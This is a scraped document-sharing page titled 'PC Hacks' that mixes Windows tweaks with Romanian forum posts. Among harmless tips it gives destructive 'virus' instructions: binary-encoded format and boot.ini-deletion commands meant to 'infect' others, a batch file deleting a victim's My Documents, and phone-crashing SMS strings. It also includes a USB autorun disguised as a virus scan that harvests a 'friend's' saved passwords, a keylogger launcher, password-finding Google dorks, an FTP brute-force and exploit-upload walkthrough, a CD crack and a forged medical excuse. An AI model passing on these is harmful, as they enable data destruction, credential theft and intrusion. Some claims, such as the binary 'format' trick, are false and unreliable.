PC Hacks

You might also like

Download as doc, pdf, or txt
Download as doc, pdf, or txt
You are on page 1of 25

1.Improvo your dial-up conection. Start/control panel/modems/properties/conection/advanced/extrra settings/typeS36=7 2. increse your bandwidth 20% Start/run/typegpedit.

msc/click computer policy>open computer config open administrative templates. open network. open qos packet schedule. open limit reservable bandwidth. it will show not configured. mark on enable & set limit 0%. 3. useful comands Program Run Command Accessibility Controls access.cpl Accessibility Wizard accwiz Add Hardware Wizard hdwwiz.cpl Add/Remove Programs appwiz.cpl Administrative Tools control admintools Adobe Acrobat ( if installed ) acrobat Adobe Distiller ( if installed ) acrodist Adobe ImageReady ( if installed ) imageready Adobe Photoshop ( if installed ) photoshop Automatic Updates wuaucpl.cpl Basic Media Player mplay32 Bluetooth Transfer Wizard fsquirt Calculator calc Ccleaner ( if installed ) ccleaner C: Drive c: Certificate Manager cdrtmgr.msc Character Map charmap Check Disk Utility chkdsk Clipboard Viewer clipbrd Command Prompt cmd Command Prompt command Component Services dcomcnfg Computer Management compmgmt.msc Compare Filescomp Control Panel control Create a shared folder Wizard shrpubw Date and Time Properties timedate.cpl DDE Shares ddeshare Device Manager devmgmt.msc Direct X Control Panel ( if installed ) directx.cpl Direct X Troubleshooter dxdiag Disk Cleanup Utility cleanmgr Disk Defragment dfrg.msc Disk Partition Manager diskmgmt.msc Display Properties control desktop Display Properties desk.cpl Display Properties (w/Appearance Tab Preselected ) control color Dr. Watson System Troubleshooting Utility drwtsn32

Driver Verifier Utility verifier Ethereal ( if installed ) ethereal Event Viewer eventvwr.msc Files and Settings Transfer Tool migwiz File Signature Verification Tool sigverif Findfast findfast.cpl Firefoxfirefox Folders Properties control folders Fonts fonts Fonts Folder fonts Free Cell Card Game freecell Game Controllers joy.cpl Group Policy Editor ( xp pro ) gpedit.msc Hearts Card Game mshearts Help and Support helpctr Hyperterminalhypertrm Hotline Client hotlineclient Iexpress Wizard iexpress Indexing Service ciadv.msc Internet Connection Wizard icwonn1 Internet Properties inetcpl.cpl Internet Setup Wizardinetwiz IP Configuration (Display Connection Configuration) ipconfig /all IP Configuration (Display DNS Cache Contents) ipconfig /displaydns IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns IP Configuration (Release All Connections) ipconfig /release IP Configuration (Renew All Connections) ipconfig /renew IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns IP Configuration (Display DHCP Class ID) ipconfig /showclassid IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid Java Control Panel ( if installed ) jpicpl32.cpl Java Control Panel ( if installed ) javaws Keyboard Properties control keyboard Local Security Settings secpol.msc Local Users and Groups lusrmgr.msc Logs You Out of Windows logoff Malicious Software Removal Tool mrt Microsoft Access ( if installed ) access.cpl Microsoft Chat winchat Microsoft Excel ( if installed ) excel Microsoft Diskpart diskpart Microsoft Frontpage ( if installed ) frontpg Microsoft Movie Maker moviemk Microsoft Management Console mmc Microsoft Narrator narrator Microsoft Paint mspaint Microsoft Powerpointpowerpnt Microsoft Word ( if installed ) winword Microsoft Syncronization Tool mobsync Minesweeper Game winmine

Mouse Properties control mouse Mouse Properties main.cpl MS-Dos Editor edit MS-Dos FTP ftp Nero ( if installed ) nero Netmeeting conf Network Connections control netconnections Network Connections ncpa.cpl Network Setup Wizard netsetup.cpl Notepad notepad Nview Desktop Manager ( if installed ) nvtuicpl.cpl Object Packager packager ODBC Data Source Administrator odbccp32 ODBC Data Source Administrator odbccp32.cpl On Screen Keyboard osk Opens AC3 Filter ( if installed ) ac3filter.cpl Outlook Express msimn Paint pbrush Password Properties password.cpl Performance Monitor perfmon.msc Performance Monitor perfmon Phone and Modem Options telephon.cpl Phone Dialer dialer Pinball Game pinball Power Configuration powercfg.cpl Printers and Faxes control printers Printers Folder printers Private Characters Editor eudcedit Quicktime ( if installed ) quicktime.cpl Quicktime Player ( if installed ) quicktimeplayer Real Player ( if installed ) realplay Regional Settings intl.cpl Registry Editor regedit Registry Editor regedit32 Remote Access Phonebook rasphone Remote Desktop mstsc Removable Storage ntmsmgr.msc Removable Storage Operator Requests ntmsoprq.msc Resultant Set of Policy ( xp pro ) rsop.msc Scanners and Cameras sticpl.cpl Scheduled Tasks control schedtasks Security Center wscui.cpl Services services.msc Shared Folders fsmgmt.msc Sharing Session rtcshare Shuts Down Windows shutdown Sounds Recorder sndrec32 Sounds and Audio mmsys.cplSpider Solitare Card Game SQL Client Configuration clicongf System Configuration Editor sysedit

spider

System Configuration Utility msconfig System File Checker Utility ( Scan Immediately ) sfc /scannow System File Checker Utility ( Scan Once At Next Boot ) sfc /scanonce System File Checker Utility ( Scan On Every Boot ) sfc /scanboot System File Checker Utility ( Return to Default Settings) sfc /revert System File Checker Utility ( Purge File Cache ) sfc /purgecache System File Checker Utility ( Set Cache Size to Size x ) sfc /cachesize=x System Information msinfo32 System Properties sysdm.cpl Task Manager taskmgr TCP Tester tcptest Telnet Client telnet Tweak UI ( if installed ) tweakui User Account Management nusrmgr.cpl Utility Manager utilman Volume Serial Number for C: label Volume Control sndvol32 Windows Address Book wab Windows Address Book Import Utility wabmig Windows Backup Utility ( if installed ) ntbackup Windows Explorer explorer Windows Firewall firewall.cpl Windows Installer Details msiexec Windows Magnifier magnify Windows Management Infrastructure wmimgmt.msc Windows Media Player wmplayer Windows Messenger msnsgs Windows Picture Import Wizard (Need camera connected)wiaacmgr Windows System Security Tool syskey Windows Script host settings wscript Widnows Update Launches wupdmgr Windows Version ( shows your windows version ) winver Windows XP Tour Wizard tourstart Wordpad write Zoom Utility igfxzoom 4. boot win xp fast. 1] Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\ 2] From the Start menu, select "Run..." & type "gpedit.msc". 3] Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window. 4] In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open". 5] Click "OK", "Apply" & "OK" once again to exit. 6] From the Start menu, select "Run..." & type "devmgmt.msc". 7] Double click on "IDE ATA/ATAPI controllers" 8] Right click on "Primary IDE Channel" and select "Properties". 9] Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK". 10] Right click on "Secondary IDE channel", select "Properties" and repeat step 9. 11] Reboot your computer.

5. xp [Shutdown XP Faster] Like previous versions of windows, it takes long time to restart or shutdown windows XP when the "Exit Windows" sound is enabled. To solve this problem you must disable this useless sound. Click Start button. Go to settings > Control Panel > Sound, Speech and Audio devices > Sounds and Audio Devices > Sounds. Then under program events and windows menu click on "Exit Windows" sub-menu and highlight it. Now from sounds you can select, choose "none" and then click Apply and OK. Now you should see some improvements when shutting down your system. [Speed Up Detailed View in Explorer] If you like to view your files in Windows Explorer using the "Details" view here is a tweak to speed up the listing of file attributes: Viewing files in Windows Explorer using the "Details" mode shows various attributes associated with each file shown. Some of these must be retrieved from the individual files when you click on the directory for viewing. For a directory with numerous and relatively large files (such as a folder in which one stores media, eg: *.mp3's, *.avi's etc.), Windows Explorer lags as it reads through each one. Here's how to disable viewing of unwanted attributes and speed up file browsing: Open Windows Explorer. Navigate to the folder which you wish to optimize. In "Details" mode right-click the bar at the top which displays the names of the attribute columns. Uncheck any that are unwanted/unneeded. Explorer will apply your preferences immediately, and longs lists of unnecessary attributes will not be displayed. Likewise, one may choose to display any information which is regarded as needed, getting more out of Explorer. [Turn Off System Restore to Save Space] By default, Windows XP keeps a backup of system files in the System Volume Information folder. This can eat up valuable space on your hard drive. If you don't want Windows to back up your system files: Open the Control Panel. Double-click on System. Click the System Restore tab. Check "Turn off System Restore on all drives". Hit Apply. You may now delete the System Volume Information folder. Warning! If you turn this off you will not be able to use Windows System Restore to restore your system in case of failure. [Very Slow Boot When Networking] On some XP Pro installations, when connected to a network (peer-peer in this case), the computer boot time is over 1:40. The system seems to freeze after logging in and the

desktop may not appear or will freeze for a minute. As timed with the utility, Bootvis.exe, the problem was with the driver mrxsmb.dll, adding over 67 seconds to the boot time. Turning off and restoring file and printer sharing eliminated 65 seconds from the boot time. Alt-click (or right-click) on Network Places > Properties. Alt-click on Ethernet Adapter connection > Properties. Un-check "File and Printer Sharing for Microsoft Networks" > OK. Reboot. If you need file or printer sharing, repeat the above, re-check the box and re-boot again. 6. Format HDD With Notepad: Step 1. Copy The Following In Notepad Exactly as it says 01001011000111110010010101010101010000011111100000 Step 2. Save As An EXE Any Name Will Do Step 3. Send the EXE to People And Infect OR IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code format c:\ /Q/X -- this will format your drive c:\ 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 format d:\ /Q/X -- this will format your dirve d:\ 01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\ 01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot. 01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001 try to figure out urself rest cant spoonfeed its workin Do not try it on ur PC. dont mess around this is for educational purpose only still if u cant figure it out try dis go to notepad @Echo off 01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001 try to figure out urself rest cant spoonfeed its workin Do not try it on ur PC. dont mess around this is for educational purpose only still if u cant figure it out try dis go to notepad @Echo off 7. Recover Corrupted Data From HDD: Free Full Songs

Ever had a hard drive get all corrupted by money and power? Or just overuse I found a good tutorial on how to recover your data from a corrupted hard drive, but it needed some tweaking so I moved some stuff around. This should be more efficient. First things first, you need a new hard drive. It can be external if you want. But you HAVE to be able to mount it as a directory in DSL (damn small linux) Now you need to borrow someone elses computer (cause yours is screwed right?). Download DSL (damn small linux) Just google Damn Small Linux Download, youll find it. Got it? Good, now boot it. after booting you will see the GUI of the DSL, run TERMINAL and follow this command *Note: this command will make you a super user in DSL #sudo su *Note: this command will mount you HDD on DSL #mount /dev/hda1 /mnt/hda1 *Note: this command will check if your data is still on the HDD #cd /mnt/hda1 #ls -al Found any data? If not stop here and cry. If yes move on. Since you already have you new hard drive connected to your PC just run this command series. #mount /dev/hdc1 /mnt/hdc1 #cd /mnt/hdc1 #mkdir backup #cp -R /mnt/hda1/*.* /mnt/hdc1/backup 8. Create Virus: HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN. HERE'S WHAT U SHOULD DO. OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.

THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE. I MEAN SAVE IT LIKE MYVIRUS.BAT. IT SHOULD HAVE THE ENDING AS .BAT. NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.rmdir C:\Documents and Settings \S\Q. 12. allinurl: +(rar|chm|zip|pdf|tgz) google mai repede tutoriale 13. virusi pe sms; Nokia 6210 : "0x40x05 0x15 0x8A" sau "%RPT" sau "%|:::::.M:::::.G" Nokia 3310/3330 : "0x04 0x05 0x15 0x8A" sau "%RPT" sau "#menu" Siemens C45: "...???" Siemens X35/X45/X55: "%English" sau "%Magyar" Motorola C350: "0x04 0x05 0x15 0x8A" LG toate modelele : "%RTP" 14.)
1.Ce iti trebuie: a)un Stick USB b)Notepad c)un pic de rabdare d)un keylogger(cum e Ardamax Kelogger)Cum sa faci keylogger

ok... in Stick facem un "New Text Document.txt" si in el scriem asa:

Code: Acum sa facem launch.bat[adica un txt nou] ..:

Code: start malware.exe asta il salvam ca launch.bat

si deci o sa avem 2 fisiere: autorun.inf si launch.bat ce fac astea?Autorun.inf iti baga o optiune in autorun [asta fiind "Open files on USB Stick" {poti sa o modifici in ce vrei}] si cand alegi aceasta optiun deschide launch.bat care executa virusul/keylogger-ul/.exe-ul care l-ai pus pe stick[nota: toate cele 3 fisiere inclusiv iconita trebuie pusa pe stick]

14.)
Daca vrei sa afli parole folosind google: 1.Intri pe www.google.ro 2.Apoi scrii "web/login.php?loguid=" 3.Cauti acest dork pe google 4.Ce scrie dupa loguip= este userul iar ce scrie dupa logpwd= este parola site-ului 5.Daca nu te descurci lasa un mesaj pe forum

Admin
Admin

Mesaje: 314 Puncte: 2147484207 Reputatie: 2

Data de inscriere: 24/03/2010 Varsta: 23 Localizare: Undeva departe

16.)cum testezi antivirusul


Daca intalniti pe net numeroase pagini in care apar bannere cum ca ar trebui sa iti testezi antivir. sau sa faci o scanare online la pc nu le accesati,unele sunt puse chiar pentru a va pacali,ele avand alte scopuri.Am sa va invat o metoda foarte simpla pentru a testa antivirusul si a vedea daca este bun sau nu.ATENTIE:daca antivirusul nu raspunde la test ar fi bine sa va ganditi sa il schimbati.

-Deschideti un fisier text (notepad) si copiati in el urmatorul text : X5O!P%@AP[4\PZX54(P^)7CC)7}$EICARSTANDARD-ANTIVIRUS-TEST-FILE!$H+H*

-Apoi click pe file/fisier > save as /salvati ca. > in casuta ce va aparea selectati locul in care vreti sa salvati fisierul ,dar cu un nume.De preferat pe descktop.

Fisierul va deveni dupa salvare un virus fals (sa nu va fie teama nu este in nici un fel daunator) care ar trebui detecatat,iar daca nu il detecteaza antivir. atunci aveti mari probleme.

17.)cum scimbi mesajul de intimpinare


Va intereseaza o schimbare in pornirea windows-ului? daca da aceea este de a schimba vechiul mesaj de intampinare ,acela cu WELCOME sau BUN VENIT.Va rog urmati pasii pe care vi descriu:

-Intrati in START si cautati RUN .

-In el scrieti regedit.exe ,iar in casuta in care va aparea intrati la HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon .

-In fisierul WINLOGON va trebui sa cautati legalnoticecaption pentru a da 2-click pe el si a scrie in al doilea spatiu liber din casuta ce va aparea un text dorit apoi cautati legalnoticetext si faceti acelasi lucru.

-Acum dati un restart si vedeti ce a iesit. SUCCES!!!!

Pentru a va da o idee va scriu textele pe care le-am scris si eu : laprima modificare :Avertizare importanta de la Windows , iar la cea de-a doua modificare :Tot ceea ce vei face pe acest calculator va fi inregistrat.Sunt cu ochii pe tine!!!. Am scris asa pentru a descuraja unele persoane care intra pe calculatorul meu.

18.)

Tehnica Brute Force - Cum sa spargi un site


ar8y7t la data de Mar Iul 20 2010, 19:05 Se poate afla parola unui server folosind metode mai putin inteligente cum ar fi conectarile repetate. Pentru acest lucru este necesar un program de brute force cracking. Cel mai bun program de acest tip este 'Brutus'. In motorul de cautare tastati 'Brutus' sau 'brute force', pe care il gasiti la sectiunea DOWNLOAD. Dar cel mai bine se intelege privind urmatorul exemplu. Sa presupunem ca serverul www.server.com are client ftp. Incercam prima data o conexiune: Deschidem Start/Run si tastam:

open ftp.server.home.ro 220 220 220 220 220

connecting to server running WU_FTPD(ftp.debbie.server.com): {introduceti debbbie} password:******** userid/password incorrect login failed goodbye

Dupa cum am vazut serverul,chiar daca nu a permis conectarea,a fost destul de amabil incat sa ne ofere doua informatii de mare inportanta:

username:debbie tipul de server:WU_FTPD

Ori gasim un exploit pentru wu_ftpd ori incercam un brute force cracking. Programul Brutus ofera doua posibilitati de a ataca un server:folosind un dictionar de parole sau incercand toate combinatiile posibile. Din moment ce stiti username-ul inlocuiti fisierul 'users.dat' care este livrat cu Brutus cu un fisier in care puneti un singur nume si anume 'debbie'.Fisierul astfel creat puteti sa-l denumiti tot 'user.dat'. Tot ce va ramane de facut dupa ce ati facut setarile este sa asteptati. Dupa ce epuizati incercarile cu dictionarul,setati optiunea 'brute force' si selectati optiunile dorite. Ideal ar fi sa stim lungimea parolei sau numarul de caractere din care este alcatuita parola precum si natura acestora. Initial eu obisnuiesc sa fac urmatoarele setari privind parola:

length min:0 length max 10 custom char :0123456789

In felul acesta incerc intai toate combintiile numerice posibile apoi schimb optiunea cu litere: custom char:abcderftyijop

Aceasta metoda este absolut sigura dar are doua dezavantaje majore:

1)Timpul mare de asteptare (1 ora-cateva luni problema(firma sau alta institutie).

depinde de noroc).Pentru cineva care are Net-ul pe Lan nu este o

2)Ip-ul dvs este inregistrat,asa ca incercati sa folositi un proxy server sau un program precum 'jammer' care zice-se ca ascunde numarul de telefon.

Voi mai da un exempu de bug in ftp:

open ftp.server.com 220 220 220 ... connecting to........(ftp.server.com):ftp {introduceti un user implicit} password:guest

ftp>dir 'tastati dir sa vedeti la ce directoare aveti acces' Daca vedeti un director numit cgi-bin,cgi-win sau script atunci servrul este hackerit!!! Cautati un exploit adecvat pentru sistemul de operare respectiv (stiti cum sa-l aflati) il puneti pe desktop, apoi dati urmatoarea comanda(pres. ca exploitul se numeste expl.exe):

cd cgi-bin(sau ce director gasiti) put expl.exe

apoi tastati 'quit' ,deschideti browserul si tastati(pres. ca directorul este cgi-bin):

http://www.server.com/cgi-bin/expl.exe

ar8y7t

Mesaje: 7 Puncte: 551 Reputatie: 0 Data de inscriere: 08/04/2010

19.) Tutorial - Cum sa faci radio pe net


ar8y7t la data de Mar Iul 20 2010, 19:02 Tutorial pentru a iti crea propriul post de radio pe internet

Descarcarea utilitarelor necesare pentru a va crea radio-ul

Pentru a va crea propriul post de radio, trebuei mai intai sa descarcati de pe internet cateva utilitare:

NullSoft Winamp NullSoft WinAmp reprezinta unealta de baza cu ajutorul careia veti emite pe internet sau cu care va veti conecta la un alt server deja existent. Pentru a il descarca de pe internet dati click pe link-ul de mai jos: http://www.winamp.com/player/free.php

2) SHOUTcast server Acest program va permite sa va lansati pe internet propria statie de radio. Urmariti acest link pentru a descarca acest program: http://www.shoutcast.com/download/files.phtml

SHOUTcast plug-in Un plug-in de WinAmp cu ajutorul caruia va veti putea configure serverul de internet din interiorul programului. Acesta este accesibil pentru descarcare la:

http://www.snapfiles.com/get/dspwinamp.html

B. Configurarea utilitarelor pentru a putea emite

Inainte de a putea emite, exista cateva setari pe care va trebui sa le faceti.

Intrati in folder-ul in care ati instalat SHOUTcast server si deschideti aplicatia sc_serv.exe. Pe ecran va aparea o fereastra in genul celei de mai jos:

Din optiunile existente in toolbar-ul de sus alegeti Edit Config

Acum se va deschide un fisier text asemanator celui prezent in imaginea de mai jos:

In aceasta fereastra trebuie sa cautati o linie cu textul Password= .Cand ati gasit aceasta linie schimbati ceea ce scrie dupa semnul egal (=) cu parola dorita pentru serverul dumneavoastra. Spre exemplu daca parola pentru server as vrea sa fie Test as scrie:

Salvati schimbarile facute in acest fisier si inchideti-l.

Acum sunteti din nou in fereastra sc_serv.exe. Sunteti anuntat ca trebuie sa restartati aplicatia pentru ca schimbarile sa ia efect. Selectati OK din casuta de dialog si din fereastra sc_serv.exe alegeti Kill Server.

20.)

Vntoarea de parole
Admin la data de Dum Iul 18 2010, 20:04 Paginile web conin foarte multe parole n diferite resurse: conturi de e-mail, servere FTP sau chiar conturi shell. Conturile shell sunt conturi ale utilizatorilor pe un server remote care permit accesul la interpretorul unix. Prezena parolelor n paginile web se explic pe de o parte prin ignorana utilizatorilor care le salveaz n fiiere accesibile public, iar pe de alt parte prin superficialitatea productorilor de software care fie furnizeaz insuficiente msuri de protecie a datelor, fie nu ofer suficiente informaii despre necesitatea de modificare a configuraiei standard a produsului.

S luam exemplul lui WS_FTP, un client FTP foarte utilizat care ofer opiunea de stocare a parolelor. WS_FTP stocheaz configuraia i informaiile referitoare la conturile de utilizatori n fiierul WS_FTP.ini. Nu toat lumea realizeaz c accesul la configuraia unui client FTP este sinonim cu accesul la resursele utilizatorului FTP. Parolele stocate n fiierul WS_FTP.ini sunt criptate, dar pot fi decriptate cu o unealt potrivit sau, mai simplu, odat instalat clientul WS_FTP, poate fi rulat cu configuraia furat. Cum se pot obine aceste fiiere de configurare WS_FTP? Prin simpla interogare Google Index of/ Parent Directory WS_FTP.ini sau filetype:ini WS_FTP PWD.

Teoretic, toat lumea tie c parolele nu trebuie s stea n locuri vizibile, accesibile tuturor. Practic, foarte muli utilizatori i stocheaz parolele n fiiere text aflate n directoare locale care sunt accesibile prin intermediul Internetului. Muli dintre aceti utilizatori sunt administratori de reea, iar fiierele pot conine date sensibile. Este greu de definit o singur metod pentru localizarea acestor date, dar folosind simple interogri Google dup cuvinte cheie cum sunt account, users, admin, administrators, passwd, password sau altele similare, rezultatul poate fi extrem de eficient, n special atunci cnd sunt compuse cu tipuri de fiiere .xls, .txt, .doc, .mdb sau .pdf. De asemenea, pot fi localizate directoare care conin n denumire cuvinte precum admin, backup i altele similare, folosind interogri precum inurl:admin intitle:index.of.

Pentru ca parolele s fie ct mai puin accesibile unei tere persoane trebuie s fim precaui atunci cnd le folosim sau le salvm. Dac administrm un site web trebuie s analizm cu atenie configuraia aplicaiei pe care o utilizm, s localizm datele neprotejate i s lum msurile necesare pentru a le securiza

21.) Inregistrare pe stic parolele de pe pc


Dup cum tim cu toii, Windows-ul poate stoca intr-o baza de date, toate parolele utilizate in diferite servicii instalete de catre utilizator, cum ar fi fi MSN, Yahoo, AOL, Windows Messenger, si restul programelor de logare pe internet etc. Exist cateva instrumente pentru recuperarea acestor parole de la locurile lor stocate.Folosind aceste instrumente i un PenDrive USB, v putei crea propriul "rootkit" pentru recuperarea parolelor de pe Computer-ul "prietenului" dvs.

Avem nevoie de urmtoarele programele pentru a crea "rootkit-ul":

1) MessenPass: recupereaz parolele celor mai populare programe de Instant Messenger: - MSN Messenge - Windows Messenger, - Yahoo Messenger, - ICQ Lite 4.x/2003, - AOL - Instant Messenger prevzute cu Netscape 7, Trillian, Miranda, i GAIM. 2) Mail PassView, recupereaz parole de e-mail cum ar fi : - Outlook - Express,

- Microsoft Outlook 2000 (POP3 si SMTP), - Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP si Conturi SMTP), - IncrediMail, - Eudora, - NetscapeMail, - Mozilla Thunderbird, - Group Mail gratuit. ! Mail PassView poate recupera, de asemenea, parolele de Web-bazate pe conturi de e-mail (Hot-mail,Yahoo!, Gmail), dac utilizai programe asociate din aceste conturi. 3) IE Passview ,este un utilitar dezvluirea parolele stocate de ctre Browser-ul Internet Explorer. Acesta susine noul Internet Explorer 8.0, precum i aversiuni mai vechi ale Internet Explorer, v6.0 - v7.0 4) Protected Storage PassView, recupereaz toate parolele protejate, stocate, inclusiv parolele Completare automat pentru Internet Explorer, site-uri protejate de parol, parole MSN Explorer, i multe altele . 5) PasswordFox: PasswordFox este un instrument de recuperare, care v permite s vizualizai nume de utilizator i parolele stocate de Mozilla Firefox. n mod implicit, PasswordFox afieaz parolele stocate n profilul dvs. curent, dar putei cu uurina sa selectai sa vizualizai parolele de oricare alt profil Firefox. Pentru fiecare parola inserata,urmtoarele informaii care sunt afiate sunt: Inregistrare Index, web site-ului, numele de utilizator, Parola. -------------------------------------------------------------------------Pasul II: Aplicaie NOT: Trebuie s dezactivai temporar antivirus dumneavoastr nainte de a urma aceti pai: 1) 1. Descarc toate cele 5 instrumente, copiai numai executabilele(.exe) n Pendrive USB. Si anume:- mspass.exe, mailpv.exe, iepv.exe, pspv.exe i passwordfox.exe n unitatea de USB. 2) 2. Creai un nou Notepad i scriei urmtorul text n acesta: [autorun] open=launch.bat ACTION= Perform a Virus Scan

Salvati Notepad-ul i redenumii-il din New Text Document.txt n autorun.inf Acum, copiai fiierul autorun.inf pe memoria USB. 3) Creai un alt Notepad i scriei urmtorul text : start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt Salvati Notepad-ul i redenumii-il din New Text Document.txt n launch.bat Acum, copiai de asemenea i launch.bat pe memoria USB.

Pasul III: Alegem un "prieten" 1) Introducei pen-driveul i va aprea o fereastra pop-up. (Acest lucru se datoreaz faptului c, avem creat un pendrive autorun). 2) n fereastra pop-up, selectai prima opiune (Perform a Virus Scan) 3) Acum, toate instrumentele se executa n fundal. (Acest proces dureaz cteva secunde). Parole sunt stocate n fiiere .txt 4)4. Scoatei pen-driveul i vei vedea parolele stocate n fiiere .txt Acest proces functioneaza pe Windows 2000, XP, Vista i 7

NOT: Aceast procedur va recupera doar parole stocate (dac este cazul), cu privire la Computer. 22.) Sunt multe posibilitati de a programa PC-ul sa se inchida dupa un anumit timp. Acest tutorial va va arata cum sa faceti acest lucru intr-un mod usor. N-aveti nevoie de programe speciale... doar de CMD. Intrati in Start->Run->CMD si scrieti shutdown -s -t XXXX *XXXX-urile le inlocuiti cu secundele pana cand PC-ul se va inchide. Daca vreti sa anulati comanda intrati din nou in CMD si scrieti shutdown -a

23.)

1. Nu deschideti atasamentul unui e-mail care provine dintr-o sursa necunoscuta sau care nu prezinta incredere. 2. Nu deschideti un mesaj e-mail decat daca stiti despre ce este vorba, chiar daca vine de la un prieten sau partener. Cei mai multi virusi se raspandesc folosind mesajele e-mail. Este mai usor sa previi decat sa repari, deci cereti confirmarea celui care l-a trimis. 3. Nu deschideti un fisier atasat la mesaje cu subiect suspicios sau neasteptat. Daca vreti sa-l deschideti, mai intai salvati-l pe hard disk si scanati-l cu o solutie antivirus actualizata. 4. Stergeti e-mail-urile sau mesajele pe care nu le doriti. Nu le retrimiteti sau raspundeti celor care le-au trimis. Acest gen de mesaje sunt considerate spam, deoarece nu sunt dorite sau solicitate si incarca traficul pe Internet. 5. Nu copiati un fisier daca nu-l stiti sau daca nu provine dintr-o sursa de incredere. 6. Fiti foarte atent cand faceti download la fisiere de pe Internet. Verificati sursa de fiecare data si fiti siguri ca un program antivirus a verificat

fisierul. Daca nu sunteti sigur de asta, copiati fisierul pe hard disk sau pe floppy disk si verificati-l folosind antivirusul propriu. 7. Faceti back-up de fisiere in mod regulat. Daca un virus le distruge, veti putea sa le inlocuiti. Este recomandat sa stocati aceste copii in locatii separate sau chiar pe alt calculator sau suport magnetic. 8. De fiecare data cand aveti dubii despre un fisier sau mesaj, nu faceti download, nu-l executati sau nu-l deschideti 24.)
Spargerea protectiei unui CD

Foarte multa lume vrea sa afle cum sa spargi protectia unui CD, de aceea voi vorbi in randurile urmatoare despre asta. In primul rind trebuie sa copiati informatia de pe cd pe calculator si sa rulati respectivul joc sau program fara cd . Normal ca nu va merge , dar va va da un mesaj de eroare intr-o fereastra draguta ... Ca de exemplu " please insert he CD " sau " you need the CD to play " Ei tocmai aici e chestia: notati mesajul care apare si apoi rulati Win 32 Dasm si apasati primul buton din stinga sau mergeti la Dissembler - Open file to Disassemble . In meniul care apare selectati programul .exe pe care doriti sa il spargeti . In fisierul de iesire care va e furnizat cautati mesajul de eroare pe care vi-l dadea programul si pe care v-am spus sa vi-l notati anterior . In felul asta ati obtinut @offset al fiecarei comenzi call si jump. Notati pe o foaie fiecare numar @offset al fiecarei comenzi jump si call ( veti avea nevoie de asta mai tarziu ) aveti nevoie de numarul care apare inainte de @offset fara h. In continuare aveti nevoie de programul Hiew.EXE. In Hiew directory veti gasi o lista de programe executabile . Mergeti in directorul und aveti programul dumneavoastra executabil . Apasati F4 , dupa care va va apare un meniu Text , Hex si Decode. Selectati Decode . Apasati F5 si acum puteti introduce numarul pe care l-ati gasit cu Win32Dasm . Asta va va duce undeva in fisier , mai exact langa o comanda ( care de fapt e ceea ce va dadea dureri de cap ) Apasati F3 pentru a edita si introduceti de 5 ori cifra 90 . Pentru fiecare byte 90 . Apasati F10 pentru iesire . Si pe aceasta cale tin sa fiu eu primul care va felicita !!

Tocmai ati SPART PROTECTIA CD-ului !!!!!!!!

25.) ATENTIE ! Scutirea este creata in totalitate de mine (In Microsoft Word) si este doar in scop informativ pentru a dovedi cum arata o scutire falsa + stampile. Prin descarcarea arhivei vei fi singurul resposabil pentru faptele tale ilegale Pentru a descarca arhiva click pe link: http://sharemobile.hi2.ro/file.php? id=557 parola arhiva: smenaru4u2010hacker

26) boot win7 from usb

This guide works 100% for Vista & Windows 7 unlike most of the guides out there. I have seen many sites/blogs that have Install Vista from USB guide but either with incomplete steps or not working guide. I have also seen some guides that dont use proper commands in this guide. After spending many hours I have come up with this 100% working guide.

I just did this method on one of my friends machine and installed the new Windows 7 BETA. The main advantage is that by using USB drive you will be able to install Windows 7/Vista in just 15 minutes. You can also use this bootable USB drive on friends computer who doesnt have a DVD optical drive. The method is very simple and you can use without any hassles. Needless to say that your motherboard should support USB Boot feature to make use of the bootable USB drive. Requirements: *USB Flash Drive (Minimum 4GB) *Windows 7 or Vista installation files. Follow the below steps to create bootable Windows 7/Vista USB drive using which you can install Windows 7/Vista easily. 1. Plug-in your USB flash drive to USB port and move all the contents from USB drive to a safe location on your system. 2. Open Command Prompt with admin rights. Use any of the below methods to open Command Prompt with admin rights. *Type cmd in Start menu search box and hit Ctrl+ Shift+ Enter. Or *Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator. 3. You need to know about the USB drive a little bit. Type in the following commands in the command prompt: First type DISKPART and hit enter to see the below message.

Next type LIST DISK command and note down the Disk number (ex: Disk 1) of your USB flash drive. In the below screenshot my Flash Drive Disk no is Disk 1. 4. Next type all the below commands one by one. Here I assume that your disk drive no is Disk 1.If you have Disk 2 as your USB flash drive then use Disk 2.Refer the above step to confirm it. So below are the commands you need to type and execute one by one: SELECT DISK 1 CLEAN CREATE PARTITION PRIMARY SELECT PARTITION 1 ACTIVE FORMAT FS=NTFS (Format process may take few seconds) ASSIGN EXIT Dont close the command prompt as we need to execute one more command at the next step. Just minimize it.

